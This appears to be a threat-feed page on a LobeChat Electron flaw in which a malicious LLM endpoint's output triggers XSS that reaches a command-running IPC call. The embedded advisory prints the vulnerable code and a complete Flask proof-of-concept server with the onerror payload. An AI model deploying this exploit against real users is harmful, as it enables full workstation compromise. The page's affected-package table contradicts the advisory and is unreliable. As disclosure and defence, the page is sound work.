AI Threat Alert

CVE-2026-42045: LobeChat: XSS-to-RCE via exposed Electron IPC

GHSA-xq4x-622m-q8fq MEDIUM CISA: TRACK*
Published May 5, 2026
CISO Take

LobeChat's message renderer falls through to unsafe HTML rendering for unrecognized artifact types, enabling stored XSS; on the Electron desktop client, this XSS can call an unfiltered `runCommand` IPC interface that executes arbitrary OS commands with the victim's privileges — a complete workstation compromise from a single chat message. With 3,535 downstream dependents and a fully public PoC (Python server plus demo video), exploitation requires only convincing a user to configure a malicious LLM provider endpoint — a realistic social engineering vector against AI and security teams that routinely experiment with custom or self-hosted models. Patch immediately to v2.1.48; if patching is not possible, restrict users from configuring untrusted LLM provider endpoints and migrate to the LobeChat web client, which does not expose the Electron IPC attack surface.

Sources: NVD GitHub Advisory ATLAS CISA KEV EPSS

What is the risk?

The CVSS score of 6.2 materially understates operational risk. While the attack requires user interaction (configuring a malicious provider endpoint), the end impact is full OS command execution — the ceiling of endpoint compromise severity. The complete exploit chain is public, the Python PoC is trivial to deploy, and the target profile (AI-forward teams experimenting with custom LLM endpoints) is exactly the demographic most likely to add an unfamiliar API URL. Risk is HIGH for any organization with LobeChat Electron deployments where users control LLM provider configuration.

How does the attack unfold?

Initial Access
Attacker deploys a malicious OpenAI-compatible API server and social-engineers the victim into adding it as a custom LLM provider in the LobeChat Electron desktop client.
AML.T0011
Malicious Output Injection
The attacker-controlled API returns a chat response containing an artifact tag with an unrecognized MIME type, bypassing LobeChat's type-specific safe renderers and routing to the default HTMLRenderer.
AML.T0077
XSS Execution
HTMLRenderer renders the attacker-controlled HTML payload without sanitization; an img onerror handler executes JavaScript in the Electron renderer process, reaching the parent window context.
AML.T0051.001
RCE via Electron IPC
The JavaScript payload calls `window.parent.electronAPI.invoke('shellCommand.handleRunCommand', {command: '...'})`, and the unfiltered Electron main process executes arbitrary OS commands with the victim's user privileges.
AML.T0050

What systems are affected?

Package Ecosystem Vulnerable Range Patched
OpenAI Node npm <= 2.1.26 No patch
11.0K 4.2K dependents Pushed 5d ago 50% patched ~0d to patch Full package profile →

Do you use OpenAI Node? You're affected.

How severe is it?

CVSS 3.1
6.2 / 10
EPSS
0.3%
chance of exploitation in 30 days
Higher than 18% of all CVEs
Source: EPSS v3 — FIRST.org
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC High
PR High
UI Required
S Changed
C High
I Low
A None

What should I do?

1 step

  1. 1) Patch immediately: upgrade to @lobehub/lobehub >= v2.1.48. 2) If patching is not immediately possible, disable or restrict the custom LLM provider configuration feature via MDM or organizational policy. 3) Migrate at-risk users to the LobeChat web client — the web context does not expose the Electron IPC attack surface. 4) Detection: monitor for unexpected child processes spawned from the LobeChat Electron process (flag electron/lobechat parent PIDs spawning shells, network tools, or scripting interpreters). 5) Audit: review LLM provider endpoints currently configured by users and flag any unrecognized or external URLs.

What does CISA's SSVC say?

Decision Track*
Exploitation poc
Automatable No
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Code Execution Prompt Injection Social Engineering API Agent AML.T0011 AML.T0049 AML.T0050 AML.T0051.001 AML.T0077 AML.T0112.000

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, Robustness and Cybersecurity
ISO 42001
A.9.3 - AI System Security Testing
NIST AI RMF
MANAGE-2.2 - Risk Treatment Plans
OWASP LLM Top 10
LLM02 - Insecure Output Handling LLM08 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-42045?

LobeChat's message renderer falls through to unsafe HTML rendering for unrecognized artifact types, enabling stored XSS; on the Electron desktop client, this XSS can call an unfiltered `runCommand` IPC interface that executes arbitrary OS commands with the victim's privileges — a complete workstation compromise from a single chat message. With 3,535 downstream dependents and a fully public PoC (Python server plus demo video), exploitation requires only convincing a user to configure a malicious LLM provider endpoint — a realistic social engineering vector against AI and security teams that routinely experiment with custom or self-hosted models. Patch immediately to v2.1.48; if patching is not possible, restrict users from configuring untrusted LLM provider endpoints and migrate to the LobeChat web client, which does not expose the Electron IPC attack surface.

Is CVE-2026-42045 actively exploited?

No confirmed active exploitation of CVE-2026-42045 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-42045?

1) Patch immediately: upgrade to @lobehub/lobehub >= v2.1.48. 2) If patching is not immediately possible, disable or restrict the custom LLM provider configuration feature via MDM or organizational policy. 3) Migrate at-risk users to the LobeChat web client — the web context does not expose the Electron IPC attack surface. 4) Detection: monitor for unexpected child processes spawned from the LobeChat Electron process (flag electron/lobechat parent PIDs spawning shells, network tools, or scripting interpreters). 5) Audit: review LLM provider endpoints currently configured by users and flag any unrecognized or external URLs.

What systems are affected by CVE-2026-42045?

This vulnerability affects the following AI/ML architecture patterns: AI chat applications (Electron desktop), LLM API integrations, Custom LLM provider deployments.

What is the CVSS score for CVE-2026-42045?

CVE-2026-42045 has a CVSS v3.1 base score of 6.2 (MEDIUM). The EPSS exploitation probability is 0.27%.

What is the AI security impact?

Affected AI Architectures

AI chat applications (Electron desktop)LLM API integrationsCustom LLM provider deployments

MITRE ATLAS Techniques

AML.T0011 User Execution
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter
AML.T0051.001 Indirect
AML.T0077 LLM Response Rendering
AML.T0112.000 Local AI Agent

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.9.3
NIST AI RMF: MANAGE-2.2
OWASP LLM Top 10: LLM02, LLM08

What are the technical details?

Original Advisory

### Summary The vulnerability was automatically discovered by an ai agent and then manually verified. LobeChat's message rendering mechanism has a stored cross-site scripting (XSS) vulnerability. Combined with the Electron main process's exposed insecure IPC interface, attackers can construct malicious payloads to achieve an attack chain from XSS to remote code execution (RCE). The LobeChat team verified this vulnerability in lobehub v2.1.23, and it also exists in the latest version. ### Details When LobeChat processes custom tags in the Render process of `src/features/Portal/Artifacts/Body/Renderer/index.tsx`, if no type match is found, it will choose to call the default method, HTMLRenderer, for HTML rendering. ```typescript const Renderer = memo<{ content: string; type?: string }>(({ content, type }) => { switch (type) { case 'application/lobe.artifacts.react': { return <ReactRenderer code={content} />; } case 'image/svg+xml': { return <SVGRender content={content} />; } case 'application/lobe.artifacts.mermaid': { return <Mermaid variant={'borderless'}>{content}</Mermaid>; } case 'text/markdown': { return <Markdown style={{ overflow: 'auto' }}>{content}</Markdown>; } default: { return <HTMLRenderer htmlContent={content} />; } } }); export default Renderer; ``` If an attacker can induce the LLM to output content containing malicious tags, an XSS vulnerability can be created on the client side. Additionally, Lobechat's Electron main process exposes an IPC interface called `runCommand`, used to invoke system commands. This interface allows arbitrary command execution and does not filter the `command` parameter. Therefore, if an attacker can obtain a handle to `window.parent.electronAPI` via XSS and call the `runCommand` method of the IPC, the `ipcMain` process can execute arbitrary system commands with the current user's privileges. ```typescript @IpcMethod() async handleRunCommand({ command, description, run_in_background, timeout = 120_000, }: RunCommandParams): Promise<RunCommandResult> { ... const childProcess = spawn(shellConfig.cmd, shellConfig.args, { env: process.env, shell: false, }); ... } ``` ### PoC The attacker launched a malicious OpenAI gateway on port 5001 ```python from flask import Flask, Response, request, jsonify import time import json app = Flask(__name__) fake_api_key = "sk-test" @app.route('/v1/chat/completions', methods=['POST', 'OPTIONS']) def chat_completions(): if request.method == 'OPTIONS': return Response(status=200, headers={ 'Access-Control-Allow-Origin': '*', 'Access-Control-Allow-Headers': '*' }) # Check for API Key auth_header = request.headers.get('Authorization') print(auth_header) if not auth_header or auth_header != f'Bearer {fake_api_key}': return jsonify({"error": {"message": "Invalid API Key", "type": "invalid_request_error", "code": "invalid_api_key"}}), 401 def generate(): payload = """ <lobeArtifact type="nebula"> <img src=x onerror='window.parent.electronAPI.invoke("shellCommand.handleRunCommand", {command:"open -a Calculator"})'> </lobeArtifact> """ # Split payload into chunks to simulate streaming chunks = [payload[i:i+10] for i in range(0, len(payload), 10)] for chunk in chunks: data = { "id": "chatcmpl-hpdoger-123", "object": "chat.completion.chunk", "created": int(time.time()), "model": "gpt-3.5-turbo", "choices": [{ "index": 0, "delta": {"content": chunk}, "finish_reason": None }] } yield f"data: {json.dumps(data)}\n\n" time.sleep(0.1) # End of stream final_data = { "id": "chatcmpl-hpdoger-123", "object": "chat.completion.chunk", "created": int(time.time()), "model": "gpt-3.5-turbo", "choices": [{ "index": 0, "delta": {}, "finish_reason": "stop" }] } yield f"data: {json.dumps(final_data)}\n\n" yield "data: [DONE]\n\n" return Response(generate(), mimetype='text/event-stream', headers={ 'Access-Control-Allow-Origin': '*', 'Access-Control-Allow-Headers': '*' }) @app.route('/v1/models', methods=['GET']) def models(): return jsonify({ "object": "list", "data": [{ "id": "gpt-3.5-turbo", "object": "model", "created": 1677610602, "owned_by": "openai" }] }) if __name__ == '__main__': print("Evil OpenAI-compatible server running on http://127.0.0.1:5001") app.run(port=5001, debug=True) ``` The victim opens the LobeChat application and configures an LLM Provider, entering the address of the HTTP server provided by the attacker. <img width="2048" height="772" alt="image" src="https://github.com/user-attachments/assets/86fe8f76-d75f-4e23-a2c5-fe29b124c7a7" /> The victim was exposed to an arbitrary command execution vulnerability while chatting <img width="2048" height="1036" alt="image" src="https://github.com/user-attachments/assets/0a84171f-ec78-4166-b7ab-298ece6b06b9" /> ### reproduction For attack reproduction, refer to this video. Once the victim configures the attacker's LLM provider endpoint, arbitrary commands can be executed. Here, our demonstration `opens a calculator` in the victim's environment. https://github.com/user-attachments/assets/6383e996-9148-4e88-8e25-90260104368d ### Impact Affected LobeChat clients can connect to the attacker's LLM endpoint and trigger arbitrary command execution simply by sending normal conversation messages. ### Patch A patch is available at https://github.com/lobehub/lobehub/releases/tag/v2.1.48.

Exploitation Scenario

An attacker deploys a malicious OpenAI-compatible API server — the public PoC is roughly 50 lines of Python/Flask — and advertises it as a free GPT-4-compatible endpoint in developer forums or via a spearphishing email targeting an AI or security team. The victim, accustomed to configuring custom LLM providers for internal tooling or model evaluation, adds the URL to LobeChat Electron. On the next chat interaction, the malicious server streams a response containing an artifact tag with an unrecognized MIME type; LobeChat's renderer defaults to HTMLRenderer without sanitization. An embedded img onerror handler calls `window.parent.electronAPI.invoke('shellCommand.handleRunCommand', {command: '...'})`, executing arbitrary shell commands — exfiltrating environment variables containing API keys, installing a reverse shell, or enrolling the machine in a botnet — while the chat UI displays a normal-looking response.

Weaknesses (CWE)

CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Primary

CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

  • [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
  • [Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:N

References

Timeline

Published
May 5, 2026
Last Modified
May 5, 2026
First Seen
May 5, 2026

Related Vulnerabilities

CRITICAL CVE-2025-61260 9.8

OpenAI Codex CLI: RCE via malicious MCP config files

Same package: openai
HIGH GHSA-gqqj-85qm-8qhf 8.7

paperclipai: connector trust bypass enables Gmail read/write

Same package: openai
HIGH GHSA-w8hx-hqjv-vjcq 7.3

Paperclip: RCE via workspace runtime command injection

Same package: openai
MEDIUM CVE-2026-39411 5.0

LobeChat: auth bypass via forged XOR obfuscated header

Same package: openai
LOW GHSA-r7w7-9xr2-qq2r 3.1

langchain-openai: SSRF DNS rebinding, blind network probe

Same package: openai
Back to Threat Feed